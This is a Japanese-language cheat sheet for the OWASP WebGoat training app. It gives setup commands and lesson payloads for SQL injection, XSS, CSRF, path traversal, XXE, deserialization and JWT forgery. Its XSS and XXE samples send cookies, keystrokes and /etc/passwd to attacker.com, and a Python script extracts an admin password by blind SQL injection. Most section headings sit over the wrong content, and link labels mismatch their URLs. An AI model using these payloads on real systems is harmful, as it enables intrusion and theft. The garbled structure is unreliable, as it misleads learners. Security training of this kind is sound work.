WebGoatチートシート
```bash
Pull WebGoat Docker image
docker pull webgoat/webgoat-8.0
Run WebGoat container
docker run -d -p 8080:8080 -p 9090:9090 —name webgoat webgoat/webgoat-8.0
Access WebGoat
Navigate to http://localhost:8080/WebGoat
WebWolf (support application): http://localhost:9090/WebWolf
Run with persistent data
docker run -d -p 8080:8080 -p 9090:9090 -v webgoat_data:/home/webgoat/.webgoat —name webgoat webgoat/webgoat-8.0
Stop container
docker stop webgoat
Remove container
docker rm webgoat
View logs
docker logs webgoat
WebGoatは、Open Web Application Security Project (OWASP)によって開発された意図的に脆弱なウェブアプリケーションで、インタラクティブで魅力的な方法でウェブアプリケーションセキュリティの概念を教えるものです。従来のセキュリティトレーニング資料とは異なり、WebGoatは安全で管理された環境で、ユーザーがウェブアプリケーションの脆弱性を特定し、攻撃する実践的な学習環境を提供します。このアプリケーションは、OWASP Top 10の脆弱性と多くの追加のセキュリティ概念をインタラクティブなレッスンと課題を通じて網羅する包括的な教育プラットフォームとして設計されています。
このプラットフォームは、各セキュリティ概念が明確な目的、背景情報、ステップバイステップのガイダンスを持つ構造化された学習モジュールとして提示されるレッスンベースのアプローチによって特徴づけられます。WebGoatには、脆弱性のメカニズム、実世界のコンテキスト、修復戦略の詳細な説明が含まれており、セキュリティの基本を学ぶ初心者から特定の攻撃技術を理解しようとする経験豊富な専門家まで、価値のあるリソースとなっています。アプリケーションはユーザーの進捗を追跡し、必要に応じてヒントを提供し、試行された解決策に対して即座のフィードバックを行います。
WebGoatのアーキテクチャは、バックエンドにSpring Boot、ユーザーインターフェースに最新のフロントエンドフレームワークを利用する最新のウェブ技術上に構築されています。この最新の基盤により、示される脆弱性と攻撃技術が現代のウェブアプリケーション開発プラクティスに関連性を持つことが保証されます。プラットフォームには、特定の学習目標を持つガイド付きレッスンと、ユーザーがさまざまな攻撃ベクトルを探索し、実験できるオープンエンドの課題の両方が含まれています。
WebGoatの教育的価値は、個人学習を超えて、教室での指導や企業トレーニングプログラムにまで及びます。このプラットフォームは、複数のユーザーアカウント、進捗追跡、構造化されたトレーニング環境に適した管理機能をサポートしています。多くのサイバーセキュリティ教育プログラム、ブートキャンプ、企業セキュリティ意識向上イニシアチブが、WebGoatを実践的トレーニングカリキュラムの中核コンポーネントとして使用しています。
```yaml
# Create docker-compose.yml
cat << 'EOF' > docker-compose.yml
version: '3.8'
services:
webgoat:
image: webgoat/webgoat-8.0
container_name: webgoat
ports:
- "8080:8080"
- "9090:9090"
volumes:
- webgoat_data:/home/webgoat/.webgoat
environment:
- WEBGOAT_PORT=8080
- WEBWOLF_PORT=9090
restart: unless-stopped
volumes:
webgoat_data:
EOF
# Start WebGoat
docker-compose up -d
# View logs
docker-compose logs -f webgoat
# Stop WebGoat
docker-compose down
# Stop and remove volumes
docker-compose down -v
```## インストール
### Docker インストール(推奨)
```bash
# Download WebGoat JAR
wget https://github.com/WebGoat/WebGoat/releases/download/v8.2.2/webgoat-server-8.2.2.jar
# Install Java (if not already installed)
# Ubuntu/Debian
sudo apt update
sudo apt install openjdk-11-jdk -y
# CentOS/RHEL
sudo yum install java-11-openjdk -y
# macOS
brew install openjdk@11
# Run WebGoat
java -jar webgoat-server-8.2.2.jar
# Run with custom port
java -jar webgoat-server-8.2.2.jar --server.port=9001
# Run with custom configuration
java -jar webgoat-server-8.2.2.jar --server.address=0.0.0.0 --server.port=8080
# Access WebGoat at http://localhost:8080/WebGoat
```### Docker Composeインストール
```bash
# Install prerequisites
# Java 11+, Maven 3.6+, Git
# Clone repository
git clone https://github.com/WebGoat/WebGoat.git
cd WebGoat
# Build WebGoat
mvn clean install
# Run WebGoat
mvn spring-boot:run
# Build standalone JAR
mvn clean package
java -jar webgoat-server/target/webgoat-server-*.jar
# Run WebWolf separately
cd webwolf
mvn spring-boot:run
```### スタンドアロンJARインストール
```yaml
# Create webgoat-deployment.yaml
cat << 'EOF' > webgoat-deployment.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
name: webgoat
labels:
app: webgoat
spec:
replicas: 1
selector:
matchLabels:
app: webgoat
template:
metadata:
labels:
app: webgoat
spec:
containers:
- name: webgoat
image: webgoat/webgoat-8.0
ports:
- containerPort: 8080
- containerPort: 9090
env:
- name: WEBGOAT_PORT
value: "8080"
- name: WEBWOLF_PORT
value: "9090"
---
apiVersion: v1
kind: Service
metadata:
name: webgoat-service
spec:
selector:
app: webgoat
ports:
- name: webgoat
port: 8080
targetPort: 8080
- name: webwolf
port: 9090
targetPort: 9090
type: LoadBalancer
EOF
# Deploy to Kubernetes
kubectl apply -f webgoat-deployment.yaml
# Check deployment status
kubectl get pods
kubectl get services
# Access WebGoat
kubectl port-forward service/webgoat-service 8080:8080
```### ソースコードインストール
```bash
# Access WebGoat
# Navigate to http://localhost:8080/WebGoat
# Create user account
# Click "Register new user"
# Username: your_username
# Password: your_password
# Login to WebGoat
# Use created credentials
# Access WebWolf (support application)
# Navigate to http://localhost:9090/WebWolf
# Use same credentials as WebGoat
```### Kubernetesデプロイ
```bash
# Default admin account (if enabled)
# Username: admin
# Password: admin
# Create additional users
# Each user has separate progress tracking
# Suitable for classroom environments
# Reset user progress
# Delete user data directory
# Or use admin interface (if available)
# Backup user progress
# Copy .webgoat directory
# Contains user data and progress
```## 初期セットアップと設定
### 初回セットアップ
```bash
# Custom server configuration
# Create application.properties
cat << 'EOF' > application.properties
server.port=8080
server.address=0.0.0.0
logging.level.org.owasp.webgoat=DEBUG
webgoat.user.directory=/custom/path
EOF
# Run with custom configuration
java -jar webgoat-server-*.jar --spring.config.location=application.properties
# Environment variables
export WEBGOAT_PORT=8080
export WEBWOLF_PORT=9090
export WEBGOAT_SSLENABLED=false
# JVM options
java -Xmx1024m -Xms512m -jar webgoat-server-*.jar
```### ユーザー管理
```bash
# HTTP Basics
# - Understanding HTTP protocol
# - Request/response structure
# - Headers and methods
# - Status codes
# HTTP Proxies
# - Proxy configuration
# - Intercepting requests
# - Modifying traffic
# - Burp Suite integration
# Developer Tools
# - Browser developer tools
# - Network tab analysis
# - Console manipulation
# - Source code inspection
```### 設定オプション
```bash
# Authentication Bypasses
# Lesson: Bypass authentication mechanisms
# Method 1: SQL Injection in login
Username: admin' --
Password: anything
# Method 2: Logic flaws
# Analyze authentication logic
# Find bypass conditions
# Method 3: Session manipulation
# Modify session tokens
# Predict session values
# Password Reset Flaws
# Lesson: Exploit password reset functionality
# Method 1: Parameter manipulation
# Change user parameter in reset request
# Reset other users' passwords
# Method 2: Token prediction
# Analyze reset token generation
# Predict valid tokens
# Secure Passwords
# Lesson: Password security concepts
# - Password complexity
# - Common passwords
# - Brute force attacks
# - Password storage
```## レッスンカテゴリとモジュール
### 一般的なセキュリティ意識
```bash
# Insecure Direct Object References
# Lesson: Access unauthorized resources
# Method 1: Parameter manipulation
# Change user ID in requests
# Access other users' data
# Method 2: Path traversal
# Modify file paths
# Access system files
# Missing Function Level Access Control
# Lesson: Access restricted functions
# Method 1: URL manipulation
# Access admin functions directly
# Bypass menu restrictions
# Method 2: Role manipulation
# Modify role parameters
# Escalate privileges
```### 認証の欠陥
```bash
# Reflected XSS
# Lesson: Execute JavaScript in victim's browser
# Basic payload
<script>alert('XSS')</script>
# Advanced payloads
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<iframe src=javascript:alert('XSS')>
# Bypass filters
<Script>alert('XSS')</Script>
<SCRIPT>alert('XSS')</SCRIPT>
<script>alert(String.fromCharCode(88,83,83))</script>
# Stored XSS
# Lesson: Persistent XSS attacks
# Basic stored payload
<script>alert('Stored XSS')</script>
# Cookie stealing
<script>
document.location='http://attacker.com/steal.php?cookie='+document.cookie;
</script>
# Keylogger
<script>
document.onkeypress = function(e) \\\\{
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://attacker.com/log.php?key=' + String.fromCharCode(e.which), true);
xhr.send();
\\\\}
</script>
# DOM-based XSS
# Lesson: Client-side XSS
# URL fragment manipulation
http://localhost:8080/WebGoat/start.mvc#<script>alert('XSS')</script>
# JavaScript injection
javascript:alert('XSS')
```### アクセス制御の欠陥
```html
<form action="http://localhost:8080/WebGoat/csrf/basic-get-flag" method="POST">
<input type="hidden" name="csrf" value="false">
<input type="submit" value="Click me!">
</form>
<form id="csrf" action="http://localhost:8080/WebGoat/csrf/review" method="POST">
<input type="hidden" name="reviewText" value="This is a CSRF attack">
<input type="hidden" name="stars" value="1">
<input type="hidden" name="validateReq" value="2aa14227b9a13d0bede0388a7fba9aa9">
</form>
<script>document.getElementById('csrf').submit();</script>
<img src="http://localhost:8080/WebGoat/csrf/basic-get-flag?csrf=false">
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8080/WebGoat/csrf/review', true);
xhr.onreadystatechange = function() \\\\{
if (xhr.readyState == 4) \\\\{
var token = xhr.responseText.match(/name="csrf" value="([^"]+)"/)[1];
// Use extracted token in CSRF attack
\\\\}
\\\\};
xhr.send();
</script>
```### クロスサイトスクリプティング(XSS)
```bash
# String SQL Injection
# Lesson: Basic SQL injection
# Authentication bypass
Username: admin' --
Password: anything
# Data extraction
' UNION SELECT user, password FROM users --
' UNION SELECT table_name, column_name FROM information_schema.columns --
# Numeric SQL Injection
# Lesson: Injection in numeric parameters
# Basic injection
1 OR 1=1
1 UNION SELECT user, password FROM users
# Advanced injection
1; DROP TABLE users; --
1; INSERT INTO users VALUES ('hacker', 'password'); --
# Blind SQL Injection
# Lesson: Extract data without direct output
# Boolean-based blind injection
1 AND 1=1 (True condition)
1 AND 1=2 (False condition)
# Extract database name
1 AND LENGTH(database())=8
1 AND SUBSTRING(database(),1,1)='w'
# Time-based blind injection
1; WAITFOR DELAY '00:00:05' --
1 AND IF(1=1, SLEEP(5), 0)
# Advanced SQL Injection
# Lesson: Complex injection scenarios
# Second-order injection
# Inject payload in one location
# Trigger execution in another
# NoSQL injection
# MongoDB injection examples
\\\\{"username": \\\\{"$ne": null\\\\}, "password": \\\\{"$ne": null\\\\}\\\\}
\\\\{"username": \\\\{"$regex": ".*"\\\\}, "password": \\\\{"$regex": ".*"\\\\}\\\\}
```### クロスサイトリクエストフォージェリ(CSRF)
```bash
# Path Traversal Lesson
# Objective: Access files outside web root
# Basic traversal
../../../etc/passwd
..\..\..\..\windows\system32\drivers\etc\hosts
# Encoded traversal
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
..%252f..%252f..%252fetc%252fpasswd
# Double encoding
..%255c..%255c..%255cwindows%255csystem32%255cdrivers%255cetc%255chosts
# Null byte injection (older systems)
../../../etc/passwd%00
../../../etc/passwd%00.jpg
# Filter bypass
....//....//....//etc/passwd
..././..././..././etc/passwd
```### SQLインジェクション
```bash
# Insecure Deserialization Lesson
# Objective: Exploit deserialization vulnerabilities
# Java deserialization
# Create malicious serialized object
# Inject into application
# PHP deserialization
# Object injection payload
O:4:"User":2:\\\\{s:4:"name";s:5:"admin";s:4:"role";s:5:"admin";\\\\}
# Python pickle deserialization
# Create malicious pickle payload
import pickle
import os
class Exploit:
def __reduce__(self):
return (os.system, ('whoami',))
payload = pickle.dumps(Exploit())
# .NET deserialization
# BinaryFormatter exploitation
# Create malicious .NET object
```### パストラバーサル
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<root></root>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfiltrate;
]>
<root></root>
```### 安全でない逆シリアル化
```bash
# JWT Lesson: JSON Web Token vulnerabilities
# JWT structure analysis
# Header.Payload.Signature
# Base64 decode each part
# Algorithm confusion attack
# Change algorithm from RS256 to HS256
# Use public key as HMAC secret
# None algorithm attack
# Set algorithm to "none"
# Remove signature
# Weak secret attack
# Brute force JWT secret
# Use common passwords
# JWT manipulation
# Modify payload claims
# Change user role/permissions
# Extend token expiration
# Example JWT manipulation
import jwt
import base64
# Decode JWT
token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9..."
decoded = jwt.decode(token, verify=False)
# Modify payload
decoded['role'] = 'admin'
decoded['exp'] = 9999999999
# Re-encode with weak secret
new_token = jwt.encode(decoded, 'secret', algorithm='HS256')
```### XML外部エンティティ(XXE)
```bash
# Admin Lost Password Challenge
# Objective: Reset admin password
# Step 1: Analyze password reset mechanism
# Step 2: Find security questions
# Step 3: Research admin information
# Step 4: Answer security questions
# Step 5: Reset password
# Without Password Change Challenge
# Objective: Change password without knowing current
# Method 1: Session manipulation
# Intercept password change request
# Remove current password parameter
# Method 2: CSRF attack
# Create CSRF form for password change
# Trick admin into submitting
# Admin Password Up Challenge
# Objective: Escalate to admin privileges
# Method 1: SQL injection
# Extract admin password hash
# Crack or replace hash
# Method 2: Session hijacking
# Steal admin session token
# Impersonate admin user
```### カスタムエクスプロイト開発
```python
#!/usr/bin/env python3
# WebGoat SQL injection exploit
import requests
import string
import sys
class WebGoatSQLi:
def __init__(self, base_url, session_cookie):
self.base_url = base_url
self.session = requests.Session()
self.session.cookies.set('JSESSIONID', session_cookie)
def blind_sqli_extract(self, table, column, condition=""):
"""Extract data using blind SQL injection"""
data = ""
position = 1
while True:
found_char = False
for char in string.printable:
if char in ['%', '_', '\\']:
continue
# Construct blind SQL injection payload
payload = f"1' AND SUBSTRING((SELECT \\\\{column\\\\} FROM \\\\{table\\\\} \\\\{condition\\\\}),\\\\{position\\\\},1)='\\\\{char\\\\}' --"
response = self.test_injection(payload)
if self.is_successful_injection(response):
data += char
found_char = True
print(f"Found: \\\\{data\\\\}")
break
if not found_char:
break
position += 1
return data
def test_injection(self, payload):
"""Test SQL injection payload"""
url = f"\\\\{self.base_url\\\\}/SqlInjection/attack5a"
data = \\\\{
'account': payload,
'operator': 'equals',
'injection': payload
\\\\}
return self.session.post(url, data=data)
def is_successful_injection(self, response):
"""Check if injection was successful"""
return "User found" in response.text
if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: python3 webgoat_sqli.py <base_url> <session_cookie>")
sys.exit(1)
base_url = sys.argv[1]
session_cookie = sys.argv[2]
exploit = WebGoatSQLi(base_url, session_cookie)
# Extract admin password
print("Extracting admin password...")
password = exploit.blind_sqli_extract("users", "password", "WHERE username='admin'")
print(f"Admin password: \\\\{password\\\\}")
```### 自動テストスクリプト
```bash
#!/bin/bash
# WebGoat automated testing script
WEBGOAT_URL="http://localhost:8080/WebGoat"
SESSION_COOKIE=""
# Function to test XSS
test_xss() \\\\{
echo "[*] Testing XSS vulnerabilities..."
payloads=(
"<script>alert('XSS')</script>"
"<img src=x onerror=alert('XSS')>"
"<svg onload=alert('XSS')>"
)
for payload in "$\\\\{payloads[@]\\\\}"; do
response=$(curl -s -b "JSESSIONID=$SESSION_COOKIE" \
-d "message=$payload" \
"$WEBGOAT_URL/CrossSiteScripting/attack1")
if [[ $response == *"$payload"* ]]; then
echo "[+] XSS successful: $payload"
else
echo "[-] XSS failed: $payload"
fi
done
\\\\}
# Function to test SQL injection
test_sqli() \\\\{
echo "[*] Testing SQL injection..."
payloads=(
"' OR '1'='1"
"' OR 1=1 --"
"' UNION SELECT user, password FROM users --"
)
for payload in "$\\\\{payloads[@]\\\\}"; do
response=$(curl -s -b "JSESSIONID=$SESSION_COOKIE" \
-d "username=$payload&password=test" \
"$WEBGOAT_URL/SqlInjection/attack1")
if [[ $response == *"Welcome"* ]]; then
echo "[+] SQL injection successful: $payload"
else
echo "[-] SQL injection failed: $payload"
fi
done
\\\\}
# Function to test CSRF
test_csrf() \\\\{
echo "[*] Testing CSRF vulnerabilities..."
# Create CSRF payload
csrf_payload="<form action='$WEBGOAT_URL/csrf/basic-get-flag' method='POST'>
<input type='hidden' name='csrf' value='false'>
</form>
<script>document.forms[0].submit();</script>"
echo "$csrf_payload" > csrf_test.html
echo "[+] CSRF payload created: csrf_test.html"
\\\\}
# Main execution
echo "[*] Starting WebGoat automated testing"
echo "[*] Target: $WEBGOAT_URL"
test_xss
test_sqli
test_csrf
echo "[*] Testing complete"
```## セキュリティツールとの統合
### Burp Suite 統合
```bash
# Configure Burp Suite for WebGoat testing
# 1. Set up proxy
# Browser proxy: 127.0.0.1:8080
# Burp proxy listener: 127.0.0.1:8080
# 2. Configure scope
# Add WebGoat URL to scope
# Include: http://localhost:8080/WebGoat/*
# 3. Spider WebGoat
# Automatically discover all endpoints
# Map application structure
# 4. Use Burp tools
# Repeater: Manual request testing
# Intruder: Automated payload testing
# Scanner: Automated vulnerability detection
# Burp Suite extensions for WebGoat
# - WebGoat lesson tracker
# - Automated solution checker
# - Custom payload generators
```### OWASP ZAP 統合
```bash
# ZAP automated scanning of WebGoat
zap-baseline.py -t http://localhost:8080/WebGoat/
# ZAP full scan
zap-full-scan.py -t http://localhost:8080/WebGoat/
# ZAP API usage
# Start ZAP daemon
zap.sh -daemon -port 8090
# Authenticate to WebGoat
curl "http://localhost:8090/JSON/authentication/action/setAuthenticationCredentials/" \
-d "contextId=0&authCredentialsConfigParams=username%3Dtest%26password%3Dtest"
# Spider WebGoat
curl "http://localhost:8090/JSON/spider/action/scan/?url=http://localhost:8080/WebGoat/"
# Active scan
curl "http://localhost:8090/JSON/ascan/action/scan/?url=http://localhost:8080/WebGoat/"
# Generate report
curl "http://localhost:8090/OTHER/core/other/htmlreport/" > webgoat_report.html
```### カスタムセキュリティテスティングフレームワーク
```python
#!/usr/bin/env python3
# WebGoat comprehensive testing framework
import requests
import json
import time
from urllib.parse import urljoin
class WebGoatTester:
def __init__(self, base_url, username, password):
self.base_url = base_url
self.session = requests.Session()
self.username = username
self.password = password
self.authenticated = False
def authenticate(self):
"""Authenticate to WebGoat"""
login_url = urljoin(self.base_url, '/login')
login_data = \\\\{
'username': self.username,
'password': self.password
\\\\}
response = self.session.post(login_url, data=login_data)
if response.status_code == 200:
self.authenticated = True
print("[+] Authentication successful")
return True
else:
print("[-] Authentication failed")
return False
def test_lesson(self, lesson_path, test_data):
"""Test specific WebGoat lesson"""
if not self.authenticated:
if not self.authenticate():
return False
lesson_url = urljoin(self.base_url, lesson_path)
try:
response = self.session.post(lesson_url, data=test_data)
# Check for success indicators
if any(indicator in response.text.lower() for indicator in
['congratulations', 'success', 'correct', 'well done']):
print(f"[+] Lesson \\\\{lesson_path\\\\} completed successfully")
return True
else:
print(f"[-] Lesson \\\\{lesson_path\\\\} failed")
return False
except Exception as e:
print(f"[!] Error testing lesson \\\\{lesson_path\\\\}: \\\\{e\\\\}")
return False
def run_all_tests(self):
"""Run all available tests"""
test_cases = [
\\\\{
'lesson': '/SqlInjection/attack1',
'data': \\\\{'username': "' OR '1'='1", 'password': 'test'\\\\}
\\\\},
\\\\{
'lesson': '/CrossSiteScripting/attack1',
'data': \\\\{'message': '<script>alert("XSS")</script>'\\\\}
\\\\},
\\\\{
'lesson': '/CSRF/basic-get-flag',
'data': \\\\{'csrf': 'false'\\\\}
\\\\}
]
results = []
for test_case in test_cases:
result = self.test_lesson(test_case['lesson'], test_case['data'])
results.append(\\\\{
'lesson': test_case['lesson'],
'success': result
\\\\})
return results
def generate_report(self, results):
"""Generate test report"""
report = \\\\{
'timestamp': time.strftime('%Y-%m-%d %H:%M:%S'),
'target': self.base_url,
'total_tests': len(results),
'passed': sum(1 for r in results if r['success']),
'failed': sum(1 for r in results if not r['success']),
'results': results
\\\\}
with open('webgoat_test_report.json', 'w') as f:
json.dump(report, f, indent=2)
print(f"\n[*] Test Report Generated")
print(f"Total Tests: \\\\{report['total_tests']\\\\}")
print(f"Passed: \\\\{report['passed']\\\\}")
print(f"Failed: \\\\{report['failed']\\\\}")
print(f"Success Rate: \\\\{(report['passed']/report['total_tests'])*100:.1f\\\\}%")
if __name__ == "__main__":
tester = WebGoatTester("http://localhost:8080/WebGoat", "test", "test")
results = tester.run_all_tests()
tester.generate_report(results)
```## 教育的ベストプラクティス
### 構造化された学習パス
```bash
# Phase 1: Foundation (Weeks 1-2)
# - HTTP Basics
# - Developer Tools
# - Basic Authentication
# - Simple XSS
# Phase 2: Core Vulnerabilities (Weeks 3-6)
# - SQL Injection (all types)
# - XSS (reflected, stored, DOM)
# - CSRF
# - Access Control
# Phase 3: Advanced Topics (Weeks 7-10)
# - XXE
# - Insecure Deserialization
# - JWT vulnerabilities
# - Path Traversal
# Phase 4: Integration (Weeks 11-12)
# - Tool usage (Burp, ZAP)
# - Automated testing
# - Report writing
# - Real-world application
```### 進捗追跡
```bash
# Create learning journal
mkdir ~/webgoat_learning
cd ~/webgoat_learning
# Track lesson completion
cat << 'EOF' > progress.md
# WebGoat Learning Progress
## Completed Lessons
- [ ] HTTP Basics
- [ ] Developer Tools
- [ ] SQL Injection - String
- [ ] SQL Injection - Numeric
- [ ] SQL Injection - Blind
- [ ] XSS - Reflected
- [ ] XSS - Stored
- [ ] XSS - DOM
- [ ] CSRF
- [ ] Access Control
- [ ] Path Traversal
- [ ] XXE
- [ ] JWT
- [ ] Insecure Deserialization
## Notes
### SQL Injection
- Key learning: Always use parameterized queries
- Common mistake: Trusting user input
### XSS
- Key learning: Validate and encode all user input
- Common mistake: Only server-side validation
EOF
# Document solutions
cat << 'EOF' > solutions.md
# WebGoat Solutions
## SQL Injection - String
**Objective**: Bypass authentication
**Solution**: Username: `admin' --`, Password: `anything`
**Explanation**: Comment out password check
## XSS - Reflected
**Objective**: Execute JavaScript
**Solution**: `<script>alert('XSS')</script>`
**Explanation**: No input validation
EOF
```### 教室への統合
```bash
# Multi-user setup for classroom
# Each student gets unique account
# Progress tracked separately
# Instructor dashboard
# Monitor student progress
# Identify common issues
# Provide targeted help
# Group exercises
# Team-based challenges
# Peer review sessions
# Collaborative problem solving
# Assessment integration
# Automated grading
# Progress reports
# Skill verification
```---
https://github.com/WebGoat/WebGoat **⚠️ セキュリティ注意**: WebGoatは、教育目的のみのために意図的に脆弱なウェブアプリケーションです。本番ネットワークやインターネットからアクセス可能なシステムに配置してはいけません。常に、ネットワークアクセスのない仮想マシンやコンテナなどの隔離された管理された環境でWebGoatを実行してください。このアプリケーションには意図的なセキュリティ脆弱性が含まれており、露出した場合にシステムセキュリティを危険にさらす可能性があります。ウェブアプリケーションセキュリティの概念を学ぶためにWebGoatを責任を持って使用し、セキュリティトレーニングを行う際は常に組織のセキュリティポリシーに従ってください。
https://owasp.org/www-project-webgoat/ **📚 追加リソース**:
- [WebGoat公式GitHubリポジトリ](https://owasp.org/www-project-top-ten/)
- [OWASPウェブゴートプロジェクトページ](https://portswigger.net/web-security)
- [OWASP トップ10](